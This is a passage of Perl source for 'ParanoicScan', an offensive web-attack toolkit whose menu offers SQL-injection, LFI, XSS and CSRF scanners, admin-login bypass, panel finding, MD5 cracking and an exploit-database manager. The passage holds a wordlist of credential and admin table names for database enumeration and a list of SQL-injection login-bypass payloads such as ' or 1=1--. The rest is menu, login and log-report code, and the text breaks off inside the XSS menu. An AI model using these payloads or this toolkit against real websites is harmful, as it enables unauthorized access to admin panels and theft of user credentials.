- 'user_passw', 'pwrd',
- 'user_pwrd', 'pwd',
- 'authors', 'user_pwd',
- 'u_pass', 'clave',
- 'usuario', 'contrasena',
- 'pas', 'sistema_password',
- 'autor', 'upassword',
- 'web_password', 'web_username',
- 'tbladmins', 'sort',
- '_wfspro_admin', '4images_users',
- 'a_admin', 'account',
- 'accounts', 'adm',
- 'admin', 'admin_login',
- 'admin_userinfo', 'administer',
- 'administrable', 'administrate',
- 'administration', 'administrator',
- 'administrators', 'adminrights',
- 'admins', 'adminuser',
- 'art', 'article_admin',
- 'articles', 'artikel',
- 'ÃÜÂë', 'aut',
- 'autore', 'backend',
- 'backend_users', 'backenduser',
- 'bbs', 'book',
- 'chat_config', 'chat_messages',
- 'chat_users', 'client',
- 'clients', 'clubconfig',
- 'company', 'config',
- 'contact', 'contacts',
- 'content', 'control',
- 'cpg_config', 'cpg132_users',
- 'customer', 'customers',
- 'customers_basket', 'dbadmins',
- 'dealer', 'dealers',
- 'diary', 'download',
- 'Dragon_users', 'e107.e107_user',
- 'e107_user', 'forum.ibf_members',
- 'fusion_user_groups', 'fusion_users',
- 'group', 'groups',
- 'ibf_admin_sessions', 'ibf_conf_settings',
- 'ibf_members', 'ibf_members_converge',
- 'ibf_sessions', 'icq',
- 'images', 'index',
- 'info', 'ipb.ibf_members',
- 'ipb_sessions', 'joomla_users',
- 'jos_blastchatc_users', 'jos_comprofiler_members',
- 'jos_contact_details', 'jos_joomblog_users',
- 'jos_messages_cfg', 'jos_moschat_users',
- 'jos_users', 'knews_lostpass',
- 'korisnici', 'kpro_adminlogs',
- 'kpro_user', 'links',
- 'login_admin', 'login_admins',
- 'login_user', 'login_users',
- 'logins', 'logs',
- 'lost_pass', 'lost_passwords',
- 'lostpass', 'lostpasswords',
- 'm_admin', 'main',
- 'mambo_session', 'mambo_users',
- 'manage', 'manager',
- 'mb_users', 'member',
- 'memberlist', 'members',
- 'minibbtable_users', 'mitglieder',
- 'movie', 'movies',
- 'mybb_users', 'mysql',
- 'mysql.user', 'names',
- 'news', 'news_lostpass',
- 'newsletter', 'nuke_authors',
- 'nuke_bbconfig', 'nuke_config',
- 'nuke_popsettings', 'nuke_users',
- 'Óû§', 'obb_profiles',
- 'order', 'orders',
- 'parol', 'partner',
- 'partners', 'passes',
- 'passwords', 'perdorues',
- 'perdoruesit', 'phorum_session',
- 'phorum_user', 'phorum_users',
- 'phpads_clients', 'phpads_config',
- 'phpbb_users', 'phpBB2.forum_users',
- 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info',
- 'pma_table_info', 'poll_user',
- 'punbb_users', 'pwds',
- 'reg_user', 'reg_users',
- 'registered', 'reguser',
- 'regusers', 'session',
- 'sessions', 'settings',
- 'shop.cards', 'shop.orders',
- 'site_login', 'site_logins',
- 'sitelogin', 'sitelogins',
- 'sites', 'smallnuke_members',
- 'smf_members', 'SS_orders',
- 'statistics', 'superuser',
- 'sysadmins', 'system',
- 'sysuser', 'sysusers',
- 'table', 'tables',
- 'tb_admin', 'tb_administrator',
- 'tb_login', 'tb_member',
- 'tb_members', 'tb_user',
- 'tb_username', 'tb_usernames',
- 'tb_users', 'tbl',
- 'tbl_user', 'tbl_users',
- 'tbluser', 'tbl_clients',
- 'tbl_client', 'tblclients',
- 'tblclient', 'test',
- 'usebb_members', 'user_admin',
- 'user_info', 'user_list',
- 'user_logins', 'user_names',
- 'usercontrol', 'userinfo',
- 'userlist', 'userlogins',
- 'usernames', 'userrights',
- 'users', 'vb_user',
- 'vbulletin_session', 'vbulletin_user',
- 'voodoo_members', 'webadmin',
- 'webadmins', 'webmaster',
- 'webmasters', 'webuser',
- 'webusers', 'x_admin',
- 'xar_roles', 'xoops_bannerclient',
- 'xoops_users', 'yabb_settings',
- 'yabbse_settings', 'ACT_INFO',
- 'ActiveDataFeed', 'Category',
- 'CategoryGroup', 'ChicksPass',
- 'ClickTrack', 'Country',
- 'CountryCodes1', 'CustomNav',
- 'DataFeedPerformance1', 'DataFeedPerformance2',
- 'DataFeedPerformance2_incoming', 'DataFeedShowtag1',
- 'DataFeedShowtag2', 'DataFeedShowtag2_incoming',
- 'dtproperties', 'Event',
- 'Event_backup', 'Event_Category',
- 'EventRedirect', 'Events_new',
- 'Genre', 'JamPass',
- 'MyTicketek', 'MyTicketekArchive',
- 'News', 'PerfPassword',
- 'PerfPasswordAllSelected', 'Promotion',
- 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag',
- 'ProxyPriceInfo', 'Region',
- 'SearchOptions', 'Series',
- 'Sheldonshows', 'StateList',
- 'States', 'SubCategory',
- 'Subjects', 'Survey',
- 'SurveyAnswer', 'SurveyAnswerOpen',
- 'SurveyQuestion', 'SurveyRespondent',
- 'sysconstraints', 'syssegments',
- 'tblRestrictedPasswords', 'tblRestrictedShows',
- 'TimeDiff', 'Titles',
- 'ToPacmail1', 'ToPacmail2',
- 'UserPreferences', 'uvw_Category',
- 'uvw_Pref', 'uvw_Preferences',
- 'Venue', 'venues',
- 'VenuesNew', 'X_3945',
- 'tblArtistCategory', 'tblArtists',
- 'tblConfigs', 'tblLayouts',
- 'tblLogBookAuthor', 'tblLogBookEntry',
- 'tblLogBookImages', 'tblLogBookImport',
- 'tblLogBookUser', 'tblMails',
- 'tblNewCategory', 'tblNews',
- 'tblOrders', 'tblStoneCategory',
- 'tblStones', 'tblUser',
- 'tblWishList', 'VIEW1',
- 'viewLogBookEntry', 'viewStoneArtist',
- 'vwListAllAvailable', 'CC_info',
- 'CC_username', 'cms_user',
- 'cms_users', 'cms_admin',
- 'cms_admins', 'jos_user',
- 'table_user', 'bulletin',
- 'cc_info', 'login_name',
- 'admuserinfo', 'userlistuser_list',
- 'SiteLogin', 'Site_Login',
- 'UserAdmin', 'Admins',
- 'Login', 'Logins'
- );
- my @bypass = split /\n/, <<'EOS';
- admin'--
- 'or'1'='1
- 'or'
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- hi' or 'a'='a
- hi') or ('a'='a
- hi") or ("a"="a
- - ' or 'x'='x
- - ' or 'x'='x
- 'or'1 ou 'or''='
- ' or 'x'='x
- admin' or 1==1
- ' OR "='
- 'or'1'='1
- EOS
- my @files_gen = (
- 'kobra', 'sql-logs.txt',
- 'logs-bypass.txt', 'jetdb-logs.txt',
- 'mssql-logs.txt', 'oracle-logs.txt',
- 'rfi-logs.txt', 'lfi-logs.txt',
- 'xss-logs.txt', 'fpd-logs.txt',
- 'csrf', 'fsd',
- 'paths-logs.txt', 'admin-logs.txt',
- 'hashes-found.txt', 'http-logs.txt',
- 'exploitdb'
- );
- my @files_chau_gen = (
- 'kobra.html', 'sqli.html', 'bypass.html', 'jetdb.html',
- 'mssql.html', 'oracle.html', 'rfi.html', 'lfi.html',
- 'xss.html', 'fpd.html', 'csrf.html', 'fsd.html',
- 'paths.html', 'admin.html', 'hash.html', 'http.html',
- 'exploitdb.html'
- );
- my $comienzo_html = qq(
- <title>Logs - ParanoicScan -</title>
- <STYLE type=text/css>
- body,a:link {
- background-color: #000000;
- color:#00FF00;
- Courier New;
- cursor:crosshair;
- font: normal 0.7em sans-serif,Arial;
- }
- input,textarea,fieldset,select,table,td,tr,option,select {
- font: normal 15px Verdana, Arial, Helvetica,
- sans-serif;
- background-color:#000000;
- color:#00FF00;
- border: solid 1px #00FF00;
- border-color:#00FF00
- }
- a:link,a:visited,a:active {
- color:#00FF00;
- font: normal 15px Verdana, Arial, Helvetica,
- sans-serif;
- text-decoration: none;
- }
- </style>
- <center>
- <br><h1>Logs - ParanoicScan -</h1><br><br>
- );
- my $final_html = qq(
- <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1>
- </center>);
- my $logs_index = qq(
- <title>Logs - ParanoicScan -</title>
- <STYLE type=text/css>
- body,a:link {
- background-color: #000000;
- color:#00FF00;
- Courier New;
- cursor:crosshair;
- font: normal 0.7em sans-serif,Arial;
- }
- input,textarea,fieldset,select,table,td,tr,option,select {
- font: normal 15px Verdana, Arial, Helvetica,
- sans-serif;
- background-color:#000000;
- color:#00FF00;
- border: solid 1px #00FF00;
- border-color:#00FF00
- }
- a:link,a:visited,a:active {
- color:#00FF00;
- font: normal 15px Verdana, Arial, Helvetica,
- sans-serif;
- text-decoration: none;
- }
- </style>
- <center>
- <br><h1>Logs - ParanoicScan -</h1><br><br>
- <table border=1>
- <td><b>Logs</b></td><tr>
- <td><a href=kobra.html>K0bra</a></td><tr>
- <td><a href=sqli.html>SQLI Links</a></td><tr>
- <td><a href=bypass.html>ByPass</a></td><tr>
- <td><a href=jetdb.html>JetDB</a></td><tr>
- <td><a href=mssql.html>MSSQL</a></td><tr>
- <td><a href=oracle.html>Oracle</a></td><tr>
- <td><a href=rfi.html>RFI</a></td><tr>
- <td><a href=lfi.html>LFI</a></td><tr>
- <td><a href=xss.html>XSS</a></td><tr>
- <td><a href=fpd.html>Full Path Discloure</a></td><tr>
- <td><a href=csrf.html>Cross Site Request Forgery</a></td><tr>
- <td><a href=fsd.html>Full Source Discloure</a></td><tr>
- <td><a href=paths.html>Paths</a></td><tr>
- <td><a href=admin.html>Admins</a></td><tr>
- <td><a href=hash.html>Hashes</a></td><tr>
- <td><a href=http.html>HTTP FingerPrinting</a></td><tr>
- <td><a href=exploitdb.html>ExploitDB</a></td><tr>
- </table>
- <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1>
- </center>
- );
- my @logs_central = (
- "logs", "logs_html",
- "logs/webs", "logs/fsdlogs",
- "logs/csrf", "logs/exploitdb/",
- "logs_html/webs", "logs_html/fsdlogs",
- "logs_html/csrf", "logs_html/exploitdb/"
- );
- ##
- for my $log (@logs_central) {
- mkdir( $log, 0777 );
- chmod $log, "0777";
- }
- unless ( -f getcwd() . "/logs_html/logs.html" ) {
- open( FILE, ">>" . getcwd() . "/" . "logs_html/logs.html" );
- print FILE $logs_index;
- close FILE;
- }
- my $nave = LWP::UserAgent->new;
- $nave->agent( $agents[ rand @agents ] );
- $nave->timeout(10);
- my $total_vulnerables;
- ##Test Proxy
- my $now_proxy;
- my $te = getdatanownownownow();
- if ( $te =~ /proxy=(.*)/ ) {
- $now_proxy = $1;
- $nave->proxy( "http", "http://" . $now_proxy );
- }
- inicio_total();
- sub inicio_total {
- head_menu();
- unless ( -f "data.txt" ) {
- instalar();
- }
- else {
- #Start the menu
- my $re = menu_login();
- printear( "\n\n\t\t\t [+] Checking ...\n\n", "text", "7", "5" );
- sleep(3);
- if ( $re eq "yes" ) {
- estoydentro();
- }
- else {
- printear( "\n\t\t\t [-] Bad Login\n\n", "text", "5", "5" );
- <stdin>;
- inicio_total();
- }
- }
- copyright_menu();
- }
- #Final
- sub estoydentro {
- head_menu();
- menu_central();
- my $op = printear( "\n\n\t\t\t[+] Option : ", "stdin", "11", "13" );
- $SIG{INT} = \&estoydentroporahora; ## Comment on this line to compile to exe
- if ( $op eq "1" ) {
- load_paranoic_old();
- }
- elsif ( $op eq "2" ) {
- load_kobra();
- }
- elsif ( $op eq "3" ) {
- lfi_scan();
- }
- elsif ( $op eq "4" ) {
- xss_scan();
- }
- elsif ( $op eq "5" ) {
- csrf_scan();
- }
- elsif ( $op eq "6" ) {
- load_bypass();
- }
- elsif ( $op eq "7" ) {
- load_fsd();
- }
- elsif ( $op eq "8" ) {
- load_findpaths();
- }
- elsif ( $op eq "9" ) {
- load_locateip();
- }
- elsif ( $op eq "10" ) {
- menu_crackhash();
- adios();
- }
- elsif ( $op eq "11" ) {
- clean();
- start_panel();
- }
- elsif ( $op eq "12" ) {
- httpfinger();
- }
- elsif ( $op eq "13" ) {
- portscanner();
- }
- elsif ( $op eq "14" ) {
- encodedecode();
- }
- elsif ( $op eq "15" ) {
- exploitdb();
- }
- elsif ( $op eq "16" ) {
- mysqlman();
- }
- elsif ( $op eq "17" ) {
- load_cmd();
- }
- elsif ( $op eq "18" ) {
- cargarlogs("logs_html/logs.html");
- estoydentro();
- }
- elsif ( $op eq "19" ) {
- head_menu();
- printear(
- "\n\n\t This program was coded By Doddy Hackman in the year 2014\n\n\n\n",
- "text", "13", "5"
- );
- <stdin>;
- estoydentro();
- }
- elsif ( $op eq "20" ) {
- my $op = printear( "\n\n\t\t\t[+] Good Bye\n", "stdin", "7", "13" );
- #<stdin>;
- genlogs();
- exit(1);
- }
- else {
- estoydentro();
- } #Fin de control
- }
- sub estoydentroporahora {
- my $op = printear( "\n\n\n\t\t[+] Press any key for return to the menu",
- "stdin", "7", "13" );
- #<stdin>;
- estoydentro();
- }
- sub menu_central {
- printear( "\n\n\t\t\t -- == Options == --\n\n", "text", "13", "5" );
- printear(
- "\n
- \t\t\t[+] 1 : Web Scanner
- \t\t\t[+] 2 : SQLi Scanner
- \t\t\t[+] 3 : LFI Scanner
- \t\t\t[+] 4 : XSS Tool
- \t\t\t[+] 5 : CSRF Tool
- \t\t\t[+] 6 : Bypass Admin
- \t\t\t[+] 7 : FSD Exploit Manager
- \t\t\t[+] 8 : Paths Finder
- \t\t\t[+] 9 : Locate IP
- \t\t\t[+] 10 : Crack MD5
- \t\t\t[+] 11 : Panel Finder
- \t\t\t[+] 12 : HTTP FingerPrinting
- \t\t\t[+] 13 : Port Scanner
- \t\t\t[+] 14 : Encoder & Decoder
- \t\t\t[+] 15 : Exploit DB Manager
- \t\t\t[+] 16 : Mysql Manager
- \t\t\t[+] 17 : Console
- \t\t\t[+] 18 : Generate LOGS
- \t\t\t[+] 19 : About
- \t\t\t[+] 20 : Exit
- ", "logos", "7", "5"
- );
- }
- sub menu_login {
- my $test_username = "";
- my $test_password = "";
- printear( "\n\n\t\t\t -- == Login == --\n\n\n\n", "text", "13", "5" );
- my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" );
- my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );
- my $word = getdatanownownownow();
- if ( $word =~ /username=(.*)/ ) {
- $test_username = $1;
- }
- if ( $word =~ /password=(.*)/ ) {
- $test_password = $1;
- }
- if ( $test_username eq md5_hex($username)
- and $test_password eq md5_hex($password) )
- {
- return "yes";
- }
- else {
- return "no";
- }
- }
- sub instalar {
- printear(
- "\n\n\t\t\t -- == Program settings == --\n\n\n\n", "text",
- "13", "5"
- );
- my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" );
- my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );
- my $proxy = printear( "\n\t\t\t[+] Proxy : ", "stdin", "11", "13" );
- my $colores =
- printear( "\n\t\t\t[+] Colors [y,n] : ", "stdin", "11", "13" );
- my $efectos =
- printear( "\n\t\t\t[+] Effects [y,n] : ", "stdin", "11", "13" );
- open( FILE, ">>data.txt" );
- print FILE "username=" . md5_hex($username) . "\n";
- print FILE "password=" . md5_hex($password) . "\n";
- if ( $proxy ne "" ) {
- print FILE "proxy=" . $proxy . "\n";
- }
- print FILE "colors=" . $colores . "\n";
- print FILE "efect=" . $efectos . "\n";
- close FILE;
- inicio_total();
- }
- sub head_menu {
- clean();
- printear( "
- @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@
- @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @
- @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @
- @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
- @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @
- @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@
- @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
- ", "logos", "13", "5" );
- if ( $^O =~ /Win32/ ) {
- printear( "
- \t\t _____
- \t\t ,----/,--. `.
- \t\t / '. `-' \
- \t\t | ____ \ '`|_
- \t\t \'.--._/` _ \ '.
- \t\t /'-|/ \|`\|-` \
- \t\t / / \ |
- \t\t | ; '` | .'
- \t\t '. |;; ; /
- \t\t \ \ ; / ,'
- \t\t ;--, .,--,
- \t\t __||=|=|./|=|=||___
- \t\t `'-'-' `-'-'`
- \t\t ______________________
- \t\t /'/ / \ \ \
- \t\t / '.'; ; \ ' \
- \t\t '-/ | ; | ; \-'
- \t\t \_| | | |_/
- \t\t `-'\_/`-'
- \t\t
- ", "logos", "7", "5" );
- }
- else {
- printear( "
- \t\t ¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾
- \t\t ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾
- \t\t ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾ ¾¾¾¾¾¾¾¾¾¾ ¾
- \t\t ¾ ¾ ¾¾¾¾ ¾ ¾
- \t\t ¾ ¾¾ ¾¾
- \t\t ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾
- \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾
- \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾
- \t\t ¾¾¾¾ ¾¾¾¾
- ", "logos", "7", "5" );
- }
- }
- sub printear { #
- my $test;
- my $efecto;
- my $word = getdatanownownownow();
- if ( $word =~ /colors=(.*)/ ) {
- $test = $1;
- }
- if ( $word =~ /efect=(.*)/ ) {
- $efecto = $1;
- }
- if ( $test eq "y" ) {
- if ( $_[1] eq "text" ) {
- if ( $efecto =~ /y/ ) {
- texto_raro( "\x03" . $_[2] . $_[0] . "\x030" );
- }
- else {
- cprint( "\x03" . $_[2] . $_[0] . "\x030" );
- }
- }
- elsif ( $_[1] eq "logos" ) {
- cprint( "\x03" . $_[2] . $_[0] . "\x030" );
- }
- elsif ( $_[1] eq "stdin" ) {
- if ( $_[3] ne "" ) {
- cprint( "\x03" . $_[2] . $_[0] . "\x030" . "\x03" . $_[3] );
- my $op = <stdin>;
- chomp $op;
- cprint("\x030");
- return $op;
- }
- }
- else {
- print "error\n";
- }
- }
- else {
- #
- if ( $_[1] eq "text" ) {
- if ( $efecto =~ /y/ ) {
- texto_raro( $_[0] );
- }
- else {
- print( $_[0] );
- }
- }
- elsif ( $_[1] eq "logos" ) {
- print( $_[0] );
- }
- elsif ( $_[1] eq "stdin" ) {
- if ( $_[3] ne "" ) {
- if ( $efecto =~ /y/ ) {
- texto_raro( $_[0] );
- }
- else {
- cprint( $_[0] );
- }
- my $op = <stdin>;
- chomp $op;
- return $op;
- }
- }
- else {
- print "error\n";
- }
- }
- } #Fin de printear
- sub texto_raro {
- my @letras = split //, $_[0];
- for (@letras) {
- usleep(40_000);
- print $_;
- }
- }
- sub clean {
- my $os = $^O;
- if ( $os =~ /Win32/ig ) {
- system("cls");
- }
- else {
- system("clear");
- }
- }
- sub copyright_menu {
- printear( "\n\n\t\t\t(C) Doddy Hackman 2014\n\n", "text", "11", "5" );
- exit(1);
- }
- ##Funciones del programa ##
- sub start_panel {
- head_panel();
- my $page = printear( "[+] Page : ", "stdin", "11", "13" );
- if ( $page eq "exit" ) {
- estoydentroporahora();
- }
- my $count = printear( "\n[+] Count : ", "stdin", "11", "13" );
- if ( $count eq "" ) {
- $count = 3;
- }
- scan_panel( $page, $count );
- adios();
- }
- sub scan_panel {
- my $web = $_[0];
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($web);
- my $web = $scheme . "://" . $auth;
- my $count = 0;
- printear( "\n[+] Searching .....\n\n", "text", "13", "5" );
- for my $path (@paneles) {
- if ( $count eq $_[1] ) {
- last;
- }
- $code = tomados( $web . "/" . $path );
- if ( $code->is_success ) {
- $controlt = 1;
- $count++;
- printear(
- "\a\a[Link] : " . $web . "/" . $path . "\n", "text",
- "7", "5"
- );
- savefile( "admin_logs.txt", $web . "/" . $path );
- }
- }
- if ( $controlt ne 1 ) {
- printear( "[-] Not found anything\n", "text", "5", "5" );
- }
- } ##
- sub head_panel {
- printear( "
- @ @@@@ @ @ @ @ @ @@@@@ @ @ @ @@@@
- @ @ @ @ @ @ @@ @ @ @ @@ @ @ @
- @ @ @ @ @@ @@ @ @@ @ @ @ @@ @ @ @
- @ @ @ @ @@ @@ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@@ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @
- @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @
- @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@@
- ", "logos", "7", "5" );
- }
- sub genlogs {
- my $cantidad = int(@files_gen);
- my $control_entrada;
- my $control_salida;
- my $contenido;
- my $nuevo_nombre;
- for my $file (@files_chau_gen) {
- unlink( getcwd() . "/logs_html/" . $file );
- }
- for my $contador ( 0 .. $cantidad - 1 ) {
- $control_entrada = $files_gen[$contador];
- $control_salida = $files_chau_gen[$contador];
- if ( $control_entrada eq "kobra" ) {
- borrar_archivos( getcwd() . "/" . "logs_html/webs/" );
- opendir my ($listando), getcwd() . "/logs/webs/";
- my @archivos = readdir $listando;
- closedir $listando;
- savefil( "logs_html/kobra.html", $comienzo_html );
- savefil( "logs_html/kobra.html",
- "<table border=1><td>Logs</td><tr>" );
- for my $archivo (@archivos) {
- if ( -f getcwd() . "/logs/webs/" . $archivo ) {
- $nuevo_nombre = $archivo;
- $nuevo_nombre =~ s/.txt/.html/ig;
- savefil( "logs_html/kobra.html",
- "<td>"
- . "<a href='webs/"
- . $nuevo_nombre . "'>"
- . $archivo . "</a>"
- . "</td><tr>" );
- $contenido =
- savewords( getcwd() . "/logs/webs/" . $archivo );
- $contenido =~ s/\n/<br>/ig;
- savefil( "logs_html/webs/" . $nuevo_nombre,
- $comienzo_html );
- savefil( "logs_html/webs/" . $nuevo_nombre, "<fieldset>" );
- savefil( "logs_html/webs/" . $nuevo_nombre, $contenido );
- savefil( "logs_html/webs/" . $nuevo_nombre, "</fieldset>" );
- savefil( "logs_html/webs/" . $nuevo_nombre, $final_html );
- }
- }
- savefil( "logs_html/kobra.html", "</table>" );
- savefil( "logs_html/kobra.html", $final_html );
- }
- elsif ( $control_entrada eq "csrf" ) {
- borrar_archivos( getcwd() . "/" . "logs_html/csrf/" );
- opendir my ($listando), getcwd() . "/logs/csrf/";
- my @archivos = readdir $listando;
- closedir $listando;
- savefil( "logs_html/csrf.html", $comienzo_html );
- savefil( "logs_html/csrf.html",
- "<table border=1><td>Logs</td><tr>" );
- for my $archivo (@archivos) {
- if ( -f getcwd() . "/logs/csrf/" . $archivo ) {
- #print $archivo."\n";
- $nuevo_nombre = $archivo;
- $nuevo_nombre =~ s/.html/.txt/ig;
- savefil( "logs_html/csrf/" . $nuevo_nombre,
- savewords( getcwd() . "/logs/csrf/" . $archivo ) );
- savefil( "logs_html/csrf.html",
- "<td>"
- . "<a href='csrf/"
- . $nuevo_nombre . "'>"
- . $nuevo_nombre . "</a>"
- . "</td><tr>" );
- }
- }
- savefil( "logs_html/csrf.html", "</table>" );
- savefil( "logs_html/csrf.html", $final_html );
- }
- elsif ( $control_entrada eq "fsd" ) {
- borrar_archivos( getcwd() . "/" . "logs_html/fsdlogs/" );
- opendir my ($listando), getcwd() . "/logs/fsdlogs/";
- my @archivos = readdir $listando;
- closedir $listando;
- savefil( "logs_html/fsd.html", $comienzo_html );
- savefil( "logs_html/fsd.html",
- "<table border=1><td>Logs</td><tr>" );
- for my $archivo (@archivos) {
- if ( -f getcwd() . "/logs/fsdlogs/" . $archivo ) {
- #print $archivo."\n";
- $nuevo_nombre = $archivo;
- $nuevo_nombre =~ s/.html/.txt/ig;
- $nuevo_nombre =~ s/.php/.txt/ig;
- savefil( "logs_html/fsdlogs/" . $nuevo_nombre,
- savewords( getcwd() . "/logs/fsdlogs/" . $archivo ) );
- savefil( "logs_html/fsd.html",
- "<td>"
- . "<a href='fsdlogs/"
- . $nuevo_nombre . "'>"
- . $nuevo_nombre . "</a>"
- . "</td><tr>" );
- }
- }
- }
- elsif ( $control_entrada eq "exploitdb" ) {
- borrar_archivos( getcwd() . "/" . "logs_html/exploitdb/" );
- opendir my ($listando), getcwd() . "/logs/exploitdb/";
- my @archivos = readdir $listando;
- closedir $listando;
- savefil( "logs_html/exploitdb.html", $comienzo_html );
- for my $archivo (@archivos) {
- my $dircon = getcwd() . "/logs/exploitdb/" . $archivo;
- if ( -d $dircon and $archivo ne "." and $archivo ne ".." ) {
- savefil( "logs_html/exploitdb.html",
- "<table border=1><td><b><center>"
- . $archivo
- . "</center></b></td><tr>" );
- #print "[+] Dir : ".$dircon."\n";
- opendir my ($listando), $dircon;
- my @archivosmas = readdir $listando;
- closedir $listando;
- for my $archi (@archivosmas) {
- if ( -f $dircon . "/" . $archi ) {
- ## yeah <td> </td>
- savefil( "logs_html/exploitdb.html",
- "<td>"
- . "<a href='exploitdb/"
- . $archi . "'>"
- . $archi . "</a>"
- . "</td><tr>" );
- savefil(
- "logs_html/exploitdb/" . $archi,
- savewords( $dircon . "/" . $archi )
- );
- #print "[+] File : ".$archi."\n";
- }
- }
- }
- savefil( "logs_html/exploitdb.html", "</table><br>" );
- }
- savefil( "logs_html/exploitdb.html", $final_html );
- }
- elsif ( $control_entrada eq "xss-logs.txt" ) {
- $contenido = savewords( "logs/" . $control_entrada );
- savefil( "logs_html/" . $control_salida, $comienzo_html );
- $contenido =~ s/\n/<br>/ig;
- $contenido =~ s/<script>/1/ig;
- $contenido =~ s/<\/script>/1/ig;
- savefil(
- "logs_html/" . $control_salida,
- "<fieldset>$contenido</fieldset>"
- );
- savefil( "logs_html/" . $control_salida, $final_html );
- }
- else {
- $contenido = savewords( "logs/" . $control_entrada );
- savefil( "logs_html/" . $control_salida, $comienzo_html );
- $contenido =~ s/\n/<br>/ig;
- savefil(
- "logs_html/" . $control_salida,
- "<fieldset>$contenido</fieldset>"
- );
- savefil( "logs_html/" . $control_salida, $final_html );
- }
- }
- }
- sub head_xss {
- printear( "
- @ @ @@@ @@@ @@@@@ @@@@ @@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @
- @ @@@ @@@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @@@ @@@ @ @@@@ @@@@ @@@@@
- ", "logos", "7", "5" );
- }
- sub xss_scan {
- clean();
- head_xss();
- printear( "
- [++] Options
- [+] 1 : XSS Scan
- [+] 2 : Generate ByPass
- [+] 3 : Hide URL
- [+] 4 : Exit
- ", "text", "13", "5" );
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my $target = printear( "\n[+] Page : ", "stdin", "11", "13" );
- scanxss( $target, "yes" );
- adios();
- }
- elsif ( $op eq "2" ) {
